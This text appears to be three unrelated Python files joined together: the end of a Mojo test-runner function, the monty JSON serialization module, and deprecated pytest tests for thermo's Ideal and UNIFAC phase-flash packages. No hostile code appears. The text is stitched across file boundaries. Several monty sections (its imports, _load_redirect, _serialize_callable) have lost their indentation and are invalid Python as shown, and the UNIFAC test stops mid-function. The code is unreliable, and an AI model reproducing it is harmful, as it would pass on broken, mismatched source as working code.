    # Second queue item is the (output, exception-text) pair from _run_test.
    (output, exception) = result.get()
    exception += timeout_exception
    if exception:
        raise Exception('%s%s%s' % (output, '\n' if output else '', exception))
    return output
def _run_test(config, shell, args, apptest, env, result):
    '''Run the test; put the shell/proc, output and any exception in |result|.'''
    output = ''
    exception = ''
    try:
        if config.target_os != Config.OS_ANDROID:
            command = _build_command_line(config, args, apptest)
            process = subprocess.Popen(command, stdout=subprocess.PIPE,
                                       stderr=subprocess.PIPE, env=env)
            # Expose the process immediately so the caller can kill it on timeout.
            result.put(process)
            (output, stderr_output) = process.communicate()
            if process.returncode:
                exception = 'Error: Test exited with code: %d\n%s' % (
                    process.returncode, stderr_output)
            elif config.is_verbose:
                output += '\n' + stderr_output
        else:
            assert shell
            # Expose the Android shell so the caller can kill it on timeout.
            result.put(shell)
            # Collect the activity's output through a pipe; the shell closes
            # the write end when the activity finishes.
            (r, w) = os.pipe()
            with os.fdopen(r, 'r') as rf:
                with os.fdopen(w, 'w') as wf:
                    arguments = args + [apptest]
                    shell.StartActivity('MojoShellActivity', arguments, wf, wf.close)
                    output = rf.read()
    except Exception as e:
        output += (e.output + '\n') if hasattr(e, 'output') else ''
        exception += str(e)
    # Final queue item carries the captured output and any error text.
    result.put((output, exception))
| |
"""
JSON serialization and deserialization utilities.
"""
import datetime
import json
import os
import types
from collections import OrderedDict, defaultdict
from enum import Enum
from hashlib import sha1
from importlib import import_module
from inspect import getfullargspec
from uuid import UUID
try:
import numpy as np
except ImportError:
np = None # type: ignore
try:
import pandas as pd
except ImportError:
pd = None # type: ignore
try:
import pydantic
except ImportError:
pydantic = None # type: ignore
try:
import bson
except ImportError:
bson = None
try:
from ruamel.yaml import YAML
except ImportError:
YAML = None # type: ignore
__version__ = "3.0.0"
def _load_redirect(redirect_file):
try:
with open(redirect_file) as f:
yaml = YAML()
d = yaml.load(f)
except OSError:
# If we can't find the file
# Just use an empty redirect dict
return {}
# Convert the full paths to module/class
redirect_dict = defaultdict(dict)
for old_path, new_path in d.items():
old_class = old_path.split(".")[-1]
old_module = ".".join(old_path.split(".")[:-1])
new_class = new_path.split(".")[-1]
new_module = ".".join(new_path.split(".")[:-1])
redirect_dict[old_module][old_class] = {
"@module": new_module,
"@class": new_class,
}
return dict(redirect_dict)
class MSONable:
    """
    This is a mix-in base class specifying an API for msonable objects. MSON
    is Monty JSON. Essentially, MSONable objects must implement an as_dict
    method, which must return a json serializable dict and must also support
    no arguments (though optional arguments to finetune the output is ok),
    and a from_dict class method that regenerates the object from the dict
    generated by the as_dict method. The as_dict method should contain the
    "@module" and "@class" keys which will allow the MontyEncoder to
    dynamically deserialize the class. E.g.::

        d["@module"] = self.__class__.__module__
        d["@class"] = self.__class__.__name__

    A default implementation is provided in MSONable, which automatically
    determines if the class already contains self.argname or self._argname
    attributes for every arg. If so, these will be used for serialization in
    the dict format. Similarly, the default from_dict will deserialize
    classes of such form. An example is given below::

        class MSONClass(MSONable):
            def __init__(self, a, b, c, d=1, **kwargs):
                self.a = a
                self.b = b
                self._c = c
                self._d = d
                self.kwargs = kwargs

    For such classes, you merely need to inherit from MSONable and you do not
    need to implement your own as_dict or from_dict protocol.

    New to Monty V2.0.6....
    Classes can be redirected to moved implementations by putting in the old
    fully qualified path and new fully qualified path into .monty.yaml in the
    home folder

    Example:
    old_module.old_class: new_module.new_class
    """

    # {old_module: {old_class: {"@module": ..., "@class": ...}}} loaded once
    # at class-creation time from ~/.monty.yaml (empty if the file is absent).
    REDIRECT = _load_redirect(os.path.join(os.path.expanduser("~"), ".monty.yaml"))

    def as_dict(self) -> dict:
        """
        A JSON serializable dict representation of an object.
        """
        d = {"@module": self.__class__.__module__, "@class": self.__class__.__name__}
        # Record the version of the top-level package implementing this class,
        # if it exposes __version__; otherwise store None.
        try:
            parent_module = self.__class__.__module__.split(".", maxsplit=1)[0]
            module_version = import_module(parent_module).__version__  # type: ignore
            d["@version"] = str(module_version)
        except (AttributeError, ImportError):
            d["@version"] = None  # type: ignore
        spec = getfullargspec(self.__class__.__init__)
        args = spec.args

        def recursive_as_dict(obj):
            # Recursively convert containers and nested as_dict-capable objects.
            if isinstance(obj, (list, tuple)):
                return [recursive_as_dict(it) for it in obj]
            if isinstance(obj, dict):
                return {kk: recursive_as_dict(vv) for kk, vv in obj.items()}
            if hasattr(obj, "as_dict"):
                return obj.as_dict()
            return obj

        for c in args:
            if c != "self":
                # Each __init__ arg must be retrievable as self.argname or
                # self._argname for the default serialization to work.
                try:
                    a = self.__getattribute__(c)
                except AttributeError:
                    try:
                        a = self.__getattribute__("_" + c)
                    except AttributeError:
                        raise NotImplementedError(
                            "Unable to automatically determine as_dict "
                            "format from class. MSONAble requires all "
                            "args to be present as either self.argname or "
                            "self._argname, and kwargs to be present under"
                            "a self.kwargs variable to automatically "
                            "determine the dict format. Alternatively, "
                            "you can implement both as_dict and from_dict."
                        )
                d[c] = recursive_as_dict(a)
        if hasattr(self, "kwargs"):
            d.update(**getattr(self, "kwargs"))  # pylint: disable=E1101
        if spec.varargs is not None and getattr(self, spec.varargs, None) is not None:
            d.update({spec.varargs: getattr(self, spec.varargs)})
        if hasattr(self, "_kwargs"):
            d.update(**getattr(self, "_kwargs"))  # pylint: disable=E1101
        if isinstance(self, Enum):
            # Enums carry their payload in "value" rather than __init__ args.
            d.update({"value": self.value})  # pylint: disable=E1101
        return d

    @classmethod
    def from_dict(cls, d):
        """
        :param d: Dict representation.
        :return: MSONable class.
        """
        # Keys beginning with "@" are serialization metadata, not ctor args.
        decoded = {k: MontyDecoder().process_decoded(v) for k, v in d.items() if not k.startswith("@")}
        return cls(**decoded)

    def to_json(self) -> str:
        """
        Returns a json string representation of the MSONable object.
        """
        return json.dumps(self, cls=MontyEncoder)

    def unsafe_hash(self):
        """
        Returns a hash of the current object. This uses a generic but low
        performance method of converting the object to a dictionary, flattening
        any nested keys, and then performing a hash on the resulting object.
        Note that the returned value is a hashlib sha1 object, not a digest.
        """

        def flatten(obj, seperator="."):
            # Flattens a dictionary, joining nested keys with `seperator` and
            # turning list indices into key components.
            flat_dict = {}
            for key, value in obj.items():
                if isinstance(value, dict):
                    flat_dict.update({seperator.join([key, _key]): _value for _key, _value in flatten(value).items()})
                elif isinstance(value, list):
                    list_dict = {f"{key}{seperator}{num}": item for num, item in enumerate(value)}
                    flat_dict.update(flatten(list_dict))
                else:
                    flat_dict[key] = value
            return flat_dict

        ordered_keys = sorted(flatten(jsanitize(self.as_dict())).items(), key=lambda x: x[0])
        # Exclude metadata keys (@module, @class, @version) from the hash.
        ordered_keys = [item for item in ordered_keys if "@" not in item[0]]
        return sha1(json.dumps(OrderedDict(ordered_keys)).encode("utf-8"))

    @classmethod
    def __get_validators__(cls):
        """Return validators for use in pydantic"""
        yield cls.validate_monty

    @classmethod
    def validate_monty(cls, v):
        """
        pydantic Validator for MSONable pattern
        """
        if isinstance(v, cls):
            return v
        if isinstance(v, dict):
            new_obj = MontyDecoder().process_decoded(v)
            if isinstance(new_obj, cls):
                return new_obj
            new_obj = cls(**v)
            return new_obj
        # Fix: the original message was truncated ("... or the proper").
        raise ValueError(f"Must provide {cls.__name__}, the as_dict form, or the proper serialized form of {cls.__name__}")

    @classmethod
    def __modify_schema__(cls, field_schema):
        """JSON schema for MSONable pattern"""
        field_schema.update(
            {
                "type": "object",
                "properties": {
                    "@class": {"enum": [cls.__name__], "type": "string"},
                    "@module": {"enum": [cls.__module__], "type": "string"},
                    "@version": {"type": "string"},
                },
                "required": ["@class", "@module"],
            }
        )
class MontyEncoder(json.JSONEncoder):
    """
    A Json Encoder which supports the MSONable API, plus adds support for
    numpy arrays, pandas DataFrames/Series, datetime/UUID objects, callables,
    and bson ObjectIds (requires bson).
    Usage::
        # Add it as a *cls* keyword when using json.dump
        json.dumps(object, cls=MontyEncoder)
    """
    def default(self, o) -> dict:  # pylint: disable=E0202
        """
        Overriding default method for JSON encoding. This method does two
        things: (a) If an object has a to_dict property, return the to_dict
        output. (b) If the @module and @class keys are not in the to_dict,
        add them to the output automatically. If the object has no to_dict
        property, the default Python json encoder default method is called.

        NOTE(review): the branch order below matters — e.g. the callable
        check must run before the as_dict attempt, and np.ndarray before
        np.generic — do not reorder.

        Args:
            o: Python object.
        Return:
            Python dict representation.
        """
        # datetime / UUID round-trip via their string representation.
        if isinstance(o, datetime.datetime):
            return {"@module": "datetime", "@class": "datetime", "string": o.__str__()}
        if isinstance(o, UUID):
            return {"@module": "uuid", "@class": "UUID", "string": o.__str__()}
        if np is not None:
            if isinstance(o, np.ndarray):
                # Complex arrays are stored as separate real/imag lists since
                # JSON has no complex number type.
                if str(o.dtype).startswith("complex"):
                    return {
                        "@module": "numpy",
                        "@class": "array",
                        "dtype": o.dtype.__str__(),
                        "data": [o.real.tolist(), o.imag.tolist()],
                    }
                return {
                    "@module": "numpy",
                    "@class": "array",
                    "dtype": o.dtype.__str__(),
                    "data": o.tolist(),
                }
            if isinstance(o, np.generic):
                # numpy scalar -> native Python scalar.
                return o.item()
        if pd is not None:
            # DataFrames/Series are embedded as their own JSON strings.
            if isinstance(o, pd.DataFrame):
                return {
                    "@module": "pandas",
                    "@class": "DataFrame",
                    "data": o.to_json(default_handler=MontyEncoder().encode),
                }
            if isinstance(o, pd.Series):
                return {
                    "@module": "pandas",
                    "@class": "Series",
                    "data": o.to_json(default_handler=MontyEncoder().encode),
                }
        if bson is not None:
            if isinstance(o, bson.objectid.ObjectId):
                return {"@module": "bson.objectid", "@class": "ObjectId", "oid": str(o)}
        # Callables (but not callable MSONables) are serialized by reference.
        if callable(o) and not isinstance(o, MSONable):
            return _serialize_callable(o)
        try:
            # pydantic models use .dict(); everything else the MSONable
            # as_dict() protocol. Missing metadata keys are filled in so the
            # MontyDecoder can reconstruct the object.
            if pydantic is not None and isinstance(o, pydantic.BaseModel):
                d = o.dict()
            else:
                d = o.as_dict()
            if "@module" not in d:
                d["@module"] = str(o.__class__.__module__)
            if "@class" not in d:
                d["@class"] = str(o.__class__.__name__)
            if "@version" not in d:
                try:
                    parent_module = o.__class__.__module__.split(".")[0]
                    module_version = import_module(parent_module).__version__  # type: ignore
                    d["@version"] = str(module_version)
                except (AttributeError, ImportError):
                    d["@version"] = None
            return d
        except AttributeError:
            # No as_dict()/dict(): defer to the stock encoder (which raises
            # TypeError for unserializable objects).
            return json.JSONEncoder.default(self, o)
class MontyDecoder(json.JSONDecoder):
    """
    A Json Decoder which supports the MSONable API. By default, the
    decoder attempts to find a module and name associated with a dict. If
    found, the decoder will generate a Pymatgen as a priority. If that fails,
    the original decoded dictionary from the string is returned. Note that
    nested lists and dicts containing pymatgen object will be decoded correctly
    as well.
    Usage:
        # Add it as a *cls* keyword when using json.load
        json.loads(json_string, cls=MontyDecoder)
    """

    def process_decoded(self, d):
        """
        Recursive method to support decoding dicts and lists containing
        pymatgen objects.

        :param d: Raw decoded json object (dict/list/scalar).
        :return: The reconstructed object, or `d` unchanged if no special
            handling applies.
        """
        if isinstance(d, dict):
            if "@module" in d and "@class" in d:
                modname = d["@module"]
                classname = d["@class"]
                if classname in MSONable.REDIRECT.get(modname, {}):
                    # Bug fix: read the redirect entry BEFORE reassigning
                    # modname. The original code overwrote modname first and
                    # then indexed REDIRECT with the *new* module name, which
                    # raised KeyError (or fetched the wrong class).
                    redirect = MSONable.REDIRECT[modname][classname]
                    modname = redirect["@module"]
                    classname = redirect["@class"]
            elif "@module" in d and "@callable" in d:
                modname = d["@module"]
                objname = d["@callable"]
                classname = None
                if d.get("@bound", None) is not None:
                    # if the function is bound to an instance or class, first
                    # deserialize the bound object and then remove the object
                    # name from the function name.
                    obj = self.process_decoded(d["@bound"])
                    objname = objname.split(".")[1:]
                else:
                    # if the function is not bound to an object, import the
                    # function from the module name
                    obj = __import__(modname, globals(), locals(), [objname], 0)
                    objname = objname.split(".")
                try:
                    # the function could be nested, e.g.
                    # MyClass.NestedClass.function, so iteratively access the
                    # nesting
                    for attr in objname:
                        obj = getattr(obj, attr)
                    return obj
                except AttributeError:
                    # Fall through and decode as a plain dict below.
                    pass
            else:
                modname = None
                classname = None
            if classname:
                if modname and modname not in ["bson.objectid", "numpy", "pandas"]:
                    if modname == "datetime" and classname == "datetime":
                        # Accept both with- and without-microseconds formats.
                        try:
                            dt = datetime.datetime.strptime(d["string"], "%Y-%m-%d %H:%M:%S.%f")
                        except ValueError:
                            dt = datetime.datetime.strptime(d["string"], "%Y-%m-%d %H:%M:%S")
                        return dt
                    if modname == "uuid" and classname == "UUID":
                        return UUID(d["string"])
                    mod = __import__(modname, globals(), locals(), [classname], 0)
                    if hasattr(mod, classname):
                        cls_ = getattr(mod, classname)
                        data = {k: v for k, v in d.items() if not k.startswith("@")}
                        if hasattr(cls_, "from_dict"):
                            return cls_.from_dict(data)
                        if pydantic is not None and issubclass(cls_, pydantic.BaseModel):
                            return cls_(**data)
                elif np is not None and modname == "numpy" and classname == "array":
                    if d["dtype"].startswith("complex"):
                        # Complex arrays were stored as [real_list, imag_list].
                        return np.array(
                            [np.array(r) + np.array(i) * 1j for r, i in zip(*d["data"])],
                            dtype=d["dtype"],
                        )
                    return np.array(d["data"], dtype=d["dtype"])
                elif pd is not None and modname == "pandas":
                    if classname == "DataFrame":
                        decoded_data = MontyDecoder().decode(d["data"])
                        return pd.DataFrame(decoded_data)
                    if classname == "Series":
                        decoded_data = MontyDecoder().decode(d["data"])
                        return pd.Series(decoded_data)
                elif (bson is not None) and modname == "bson.objectid" and classname == "ObjectId":
                    return bson.objectid.ObjectId(d["oid"])
            # No recognized metadata: decode values (and keys) recursively.
            return {self.process_decoded(k): self.process_decoded(v) for k, v in d.items()}
        if isinstance(d, list):
            return [self.process_decoded(x) for x in d]
        return d

    def decode(self, s):
        """
        Overrides decode from JSONDecoder.
        :param s: string
        :return: Object.
        """
        d = json.JSONDecoder.decode(self, s)
        return self.process_decoded(d)
class MSONError(Exception):
    """Raised when MSON serialization or deserialization fails."""
def jsanitize(obj, strict=False, allow_bson=False, enum_values=False):
    """
    This method cleans an input json-like object, either a list or a dict or
    some sequence, nested or otherwise, by converting all non-string
    dictionary keys (such as int and float) to strings, and also recursively
    encodes all objects using Monty's as_dict() protocol.

    Args:
        obj: input json-like object.
        strict (bool): This parameter sets the behavior when jsanitize
            encounters an object it does not understand. If strict is True,
            jsanitize will try to get the as_dict() attribute of the object. If
            no such attribute is found, an attribute error will be thrown. If
            strict is False, jsanitize will simply call str(object) to convert
            the object to a string representation.
        allow_bson (bool): This parameter sets the behavior when jsanitize
            encounters a bson supported type such as objectid and datetime. If
            True, such bson types will be ignored, allowing for proper
            insertion into MongoDb databases.
        enum_values (bool): Convert Enums to their values.

    Returns:
        Sanitized dict that can be json serialized.
    """
    if isinstance(obj, Enum) and enum_values:
        return obj.value
    if allow_bson and (
        isinstance(obj, (datetime.datetime, bytes)) or (bson is not None and isinstance(obj, bson.objectid.ObjectId))
    ):
        return obj
    if isinstance(obj, (list, tuple)):
        return [jsanitize(i, strict=strict, allow_bson=allow_bson, enum_values=enum_values) for i in obj]
    if np is not None and isinstance(obj, np.ndarray):
        return [jsanitize(i, strict=strict, allow_bson=allow_bson, enum_values=enum_values) for i in obj.tolist()]
    if np is not None and isinstance(obj, np.generic):
        return obj.item()
    # Bug fix: the original condition was
    #   pd is not None and isinstance(obj, pd.DataFrame) or isinstance(obj, pd.Series)
    # which, due to `and` binding tighter than `or`, evaluated pd.Series even
    # when pandas is not installed (pd is None) -> AttributeError.
    if pd is not None and (isinstance(obj, pd.DataFrame) or isinstance(obj, pd.Series)):
        return obj.to_dict()
    if isinstance(obj, dict):
        return {
            k.__str__(): jsanitize(v, strict=strict, allow_bson=allow_bson, enum_values=enum_values)
            for k, v in obj.items()
        }
    if isinstance(obj, (int, float)):
        return obj
    if obj is None:
        return None
    if callable(obj) and not isinstance(obj, MSONable):
        # Best effort: unserializable callables fall through to str()/as_dict().
        try:
            return _serialize_callable(obj)
        except TypeError:
            pass
    if not strict:
        return obj.__str__()
    if isinstance(obj, str):
        return obj.__str__()
    if pydantic is not None and isinstance(obj, pydantic.BaseModel):
        return jsanitize(MontyEncoder().default(obj), strict=strict, allow_bson=allow_bson, enum_values=enum_values)
    return jsanitize(obj.as_dict(), strict=strict, allow_bson=allow_bson, enum_values=enum_values)
def _serialize_callable(o):
if isinstance(o, types.BuiltinFunctionType):
# don't care about what builtin functions (sum, open, etc) are bound to
bound = None
else:
# bound methods (i.e., instance methods) have a __self__ attribute
# that points to the class/module/instance
bound = getattr(o, "__self__", None)
# we are only able to serialize bound methods if the object the method is
# bound to is itself serializable
if bound is not None:
try:
bound = MontyEncoder().default(bound)
except TypeError:
raise TypeError("Only bound methods of classes or MSONable instances are supported.")
return {
"@module": o.__module__,
"@callable": getattr(o, "__qualname__", o.__name__),
"@bound": bound,
}
| |
# -*- coding: utf-8 -*-
'''Chemical Engineering Design Library (ChEDL). Utilities for process modeling.
Copyright (C) 2016, Caleb Bell <Caleb.Andrew.Bell@gmail.com>
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.'''
from random import uniform
from numpy.testing import assert_allclose
import pytest
import pandas as pd
import numpy as np
from thermo.property_package import *
from thermo.eos import *
from thermo.eos_mix import *
from thermo.chemical import Chemical
from thermo.mixture import Mixture
from thermo.property_package_constants import PropertyPackageConstants, NRTL_PKG, PR_PKG, IDEAL_PKG
@pytest.mark.deprecated
def test_Ideal():
    """Exercise the Ideal property package on a low-pressure ethanol/water flash.

    Checks TP, T-VF and P-VF flashes against fixed reference values, then
    verifies the generic ``flash`` interface reproduces the same state for all
    three specification pairs, and finally checks dew/bubble point helpers.
    """
    m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
    vodka = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
    # Low pressure ethanol-water ideal TP flash
    phase, xs, ys, V_over_F = vodka.flash_TP_zs(m.T, m.P, m.zs)
    V_over_F_expect = 0.49376976949268025
    xs_expect = [0.38951827297213176, 0.6104817270278682]
    ys_expect = [0.6132697738819218, 0.3867302261180783]
    assert phase == 'l/g'
    assert_allclose(xs, xs_expect)
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # Same flash with T-VF spec
    phase, xs, ys, V_over_F, P = vodka.flash_TVF_zs(m.T, V_over_F_expect, m.zs)
    assert phase == 'l/g'
    assert_allclose(xs, xs_expect)
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # Same flash with P-VF spec
    phase, xs, ys, V_over_F, T = vodka.flash_PVF_zs(m.P, V_over_F_expect, m.zs)
    assert phase == 'l/g'
    assert_allclose(xs, xs_expect)
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # Test the flash interface directly
    T_known = m.T
    V_over_F_known = V_over_F_expect
    zs = m.zs
    vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
    P_known = vodka.P
    xs_known = vodka.xs
    ys_known = vodka.ys
    phase_known = vodka.phase
    # test TP flash gives the same as TVF
    vodka.flash(T=T_known, P=P_known, zs=zs)
    assert_allclose(V_over_F_known, vodka.V_over_F)
    assert_allclose(xs_known, vodka.xs)
    assert_allclose(ys_known, vodka.ys)
    assert vodka.phase == phase_known
    # Test PVF flash gives same as well
    # (a copy-pasted duplicate xs assertion was removed here)
    vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
    assert_allclose(xs_known, vodka.xs)
    assert_allclose(ys_known, vodka.ys)
    assert_allclose(T_known, vodka.T)
    assert vodka.phase == phase_known
    # A ternary plot of a binary package must raise
    with pytest.raises(Exception):
        vodka.plot_ternary(T=300)
    # Test Tdew, Tbubble, Pbubble, Pdew
    T = 298.15
    Pdew = vodka.Pdew(298.15, [0.5, 0.5])
    T_recalc = vodka.Tdew(Pdew, [0.5, 0.5])
    assert_allclose(T_recalc, T)
    assert_allclose(Pdew, 4517, rtol=2E-3)
    T2 = 294.7556209619327
    Pbubble = vodka.Pbubble(T2, [0.5, 0.5])
    assert_allclose(Pbubble, 4517, rtol=2E-3)
    T2_recalc = vodka.Tbubble(4517.277960030594, [0.5, 0.5])
    assert_allclose(T2_recalc, T2)
    # Pure-component flashes; each is called twice to check repeat-call stability
    vodka.flash(P=5000, VF=0, zs=[1, 0])
    vodka.flash(P=5000, VF=0, zs=[1, 0])
    vodka.flash(P=5000, VF=1, zs=[0, 1])
    vodka.flash(P=5000, VF=1, zs=[0, 1])
@pytest.mark.deprecated
def test_Ideal_composition_zeros():
    """Flash pure-component (zero-composition) feeds over wide P, T and VF ranges."""
    mix = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
    pkg = Ideal(mix.VaporPressures, mix.Tms, mix.Tcs, mix.Pcs)
    # Zero-composition components - pressure specs
    pkg.flash(P=5000, VF=0, zs=[1, 0])
    pressure = 0.1
    for _ in range(7):
        pressure *= 10
        for vapor_fraction in (0, 0.3, 1):
            pkg.flash(P=pressure, VF=vapor_fraction, zs=[1, 0])
            pkg.flash(P=pressure, VF=vapor_fraction, zs=[0, 1])
    # Zero-composition components - temperature specs
    for vapor_fraction in (0, 0.3, 1):
        pkg.flash(T=300, VF=vapor_fraction, zs=[1, 0])
        pkg.flash(T=300, VF=vapor_fraction, zs=[0, 1])
@pytest.mark.deprecated
def test_Ideal_single_component():
    """Flash behavior of the Ideal package for a pure (single-component) feed.

    Checks TP flashes either side of the vapor pressure, and TVF/PVF flashes
    at VF = 0 and VF = 1 for water.
    """
    m = Mixture(['water'], zs=[1], T=298.15)
    test_pkg = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
    # T and P with TP flash: exactly at Psat the package reports pure gas,
    # with xs reported as None for the absent phase.
    phase, xs, ys, V_over_F = test_pkg.flash_TP_zs(m.T, m.VaporPressures[0](298.15), m.zs)
    V_over_F_expect = 1
    xs_expect = None
    ys_expect = [1]
    assert phase == 'g'
    assert xs == None
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # Infinitesimally above Psat the result flips to pure liquid.
    phase, xs, ys, V_over_F = test_pkg.flash_TP_zs(m.T, m.VaporPressures[0](298.15)+1E-10, m.zs)
    V_over_F_expect = 0
    xs_expect = [1]
    ys_expect = None
    assert phase == 'l'
    assert ys == None
    assert_allclose(xs, xs_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # TVF: at VF = 1 both phase compositions are reported as [1].
    phase, xs, ys, V_over_F, P = test_pkg.flash_TVF_zs(m.T, 1, m.zs)
    V_over_F_expect = 1
    xs_expect = [1]
    ys_expect = [1]
    assert phase == 'l/g'
    assert xs == xs_expect
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # Returned P should be the vapor pressure of water at 298.15 K.
    assert_allclose(P, 3167.418523735963, rtol=1E-3)
    phase, xs, ys, V_over_F, P = test_pkg.flash_TVF_zs(m.T, 0, m.zs)
    V_over_F_expect = 0
    xs_expect = [1]
    ys_expect = [1]
    assert phase == 'l/g'
    assert xs == xs_expect
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # PVF: the recovered temperature should invert the Psat relationship.
    phase, xs, ys, V_over_F, T = test_pkg.flash_PVF_zs(3167, 1, m.zs)
    V_over_F_expect = 1
    xs_expect = [1]
    ys_expect = [1]
    assert phase == 'l/g'
    assert xs == xs_expect
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    assert_allclose(T, 298.1477829296143, rtol=1E-3)
    phase, xs, ys, V_over_F, T = test_pkg.flash_PVF_zs(3167, 0, m.zs)
    V_over_F_expect = 0
    xs_expect = [1]
    ys_expect = [1]
    assert phase == 'l/g'
    assert xs == xs_expect
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    assert_allclose(T, 298.1477829296143, rtol=1E-3)
#import matplotlib.pyplot as plt
#@pytest.mark.mpl_image_compare
#def test_Ideal_matplotlib():
# m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
# vodka = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
# return vodka.plot_Pxy(T=300, pts=30, display=False)
@pytest.mark.slow
@pytest.mark.deprecated
def test_IdealPP_fuzz_TP_VF():
    """Randomized consistency fuzzing of the Ideal package flash interface.

    For random compositions/temperatures/vapor fractions, a T-VF flash fixes
    the state; TP and P-VF flashes with the resulting values must then
    reproduce the same state. Run on a binary and a five-component system.
    """
    m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=5000, T=298.15)
    vodka = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
    for i in range(500):
        # May fail right now on the transition between vapor pressure
        # function boundaries; there are multiple solutions for that case
        # Especially near T = 513.9263246740085 or T = 273.15728497179936
        # Failure is only for PVF flashes
        # There may also be failures for extrapolated vapor pressures, but
        # those are not tested for here.
        zs = [uniform(0, 1) for i in range(2)]
        zs = [i/sum(zs) for i in zs]
        T_known = uniform(200, 513)
        V_over_F_known = uniform(0, 1)
        # Skip the problematic temperature windows described above.
        if 273.14 < T_known < 274.15 or 513.85 < T_known < 514.:
            continue
        vodka.flash(T=T_known, VF=V_over_F_known, zs=zs)
        P_known = vodka.P
        xs_known = vodka.xs
        ys_known = vodka.ys
        phase_known = vodka.phase
        # test TP flash gives the same as TVF
        vodka.flash(T=T_known, P=P_known, zs=zs)
        assert_allclose(V_over_F_known, vodka.V_over_F)
        assert_allclose(xs_known, vodka.xs)
        assert_allclose(ys_known, vodka.ys)
        assert vodka.phase == phase_known
        # Test PVF flash gives same as well
        vodka.flash(VF=V_over_F_known, P=P_known, zs=zs)
        assert_allclose(xs_known, vodka.xs)
        assert_allclose(ys_known, vodka.ys)
        # NOTE(review): duplicate of the xs assertion two lines above;
        # possibly intended to check V_over_F instead.
        assert_allclose(xs_known, vodka.xs)
        assert_allclose(T_known, vodka.T)
        assert vodka.phase == phase_known
    # Repeat the same fuzzing on a five-component hexane-isomer system.
    names = ['hexane', '2-methylpentane', '3-methylpentane', '2,3-dimethylbutane', '2,2-dimethylbutane']
    m = Mixture(names, zs=[.2, .2, .2, .2, .2], P=1E5, T=300)
    test_pkg = Ideal(m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
    for i in range(500):
        zs = [uniform(0, 1) for i in range(5)]
        zs = [i/sum(zs) for i in zs]
        T_known = uniform(200, 488.0)
        V_over_F_known = uniform(0, 1)
        test_pkg.flash(T=T_known, VF=V_over_F_known, zs=zs)
        P_known = test_pkg.P
        xs_known = test_pkg.xs
        ys_known = test_pkg.ys
        phase_known = test_pkg.phase
        # test TP flash gives the same as TVF
        test_pkg.flash(T=T_known, P=P_known, zs=zs)
        assert_allclose(V_over_F_known, test_pkg.V_over_F)
        assert_allclose(xs_known, test_pkg.xs)
        assert_allclose(ys_known, test_pkg.ys)
        assert test_pkg.phase == phase_known
        # Test PVF flash gives same as well
        test_pkg.flash(VF=V_over_F_known, P=P_known, zs=zs)
        assert_allclose(xs_known, test_pkg.xs)
        assert_allclose(ys_known, test_pkg.ys)
        # NOTE(review): duplicate assertion, same as in the binary loop above.
        assert_allclose(xs_known, test_pkg.xs)
        assert_allclose(T_known, test_pkg.T)
        assert test_pkg.phase == phase_known
@pytest.mark.slow
@pytest.mark.deprecated
def test_Unifac():
    """UNIFAC activity-coefficient package on an ethanol/water flash.

    Same structure as test_Ideal: TP, T-VF, P-VF flashes against reference
    values, then the generic flash interface consistency checks.
    """
    m = Mixture(['ethanol', 'water'], zs=[0.5, 0.5], P=6500, T=298.15)
    vodka = Unifac(m.UNIFAC_groups, m.VaporPressures, m.Tms, m.Tcs, m.Pcs)
    # Low pressure ethanol-water ideal TP flash
    phase, xs, ys, V_over_F = vodka.flash_TP_zs(m.T, m.P, m.zs)
    V_over_F_expect = 0.7522885045317019
    xs_expect = [0.2761473052710751, 0.7238526947289249]
    ys_expect = [0.5737096013588943, 0.42629039864110585]
    assert phase == 'l/g'
    assert_allclose(xs, xs_expect)
    assert_allclose(ys, ys_expect)
    assert_allclose(V_over_F, V_over_F_expect)
    # Same flash with T-VF spec
    phase, xs, ys, V_over_F, P = vodka.flash_TVF_zs(m.T, V_over_F_expect, m.zs)
    assert phase == 'l/g'
    assert_allclose(xs, xs_expect, rtol=1E-5)
    assert_allclose(ys, ys_expect, rtol=1E-5)
    assert_allclose(V_over_F, V_over_F_expect, rtol=1E-5)
    # Same flash with P-VF spec
    phase, xs, ys, V_over_F, T = vodka.flash_PVF_zs(m.P, V_over_F_expect, m.zs)
    assert phase == 'l/g'
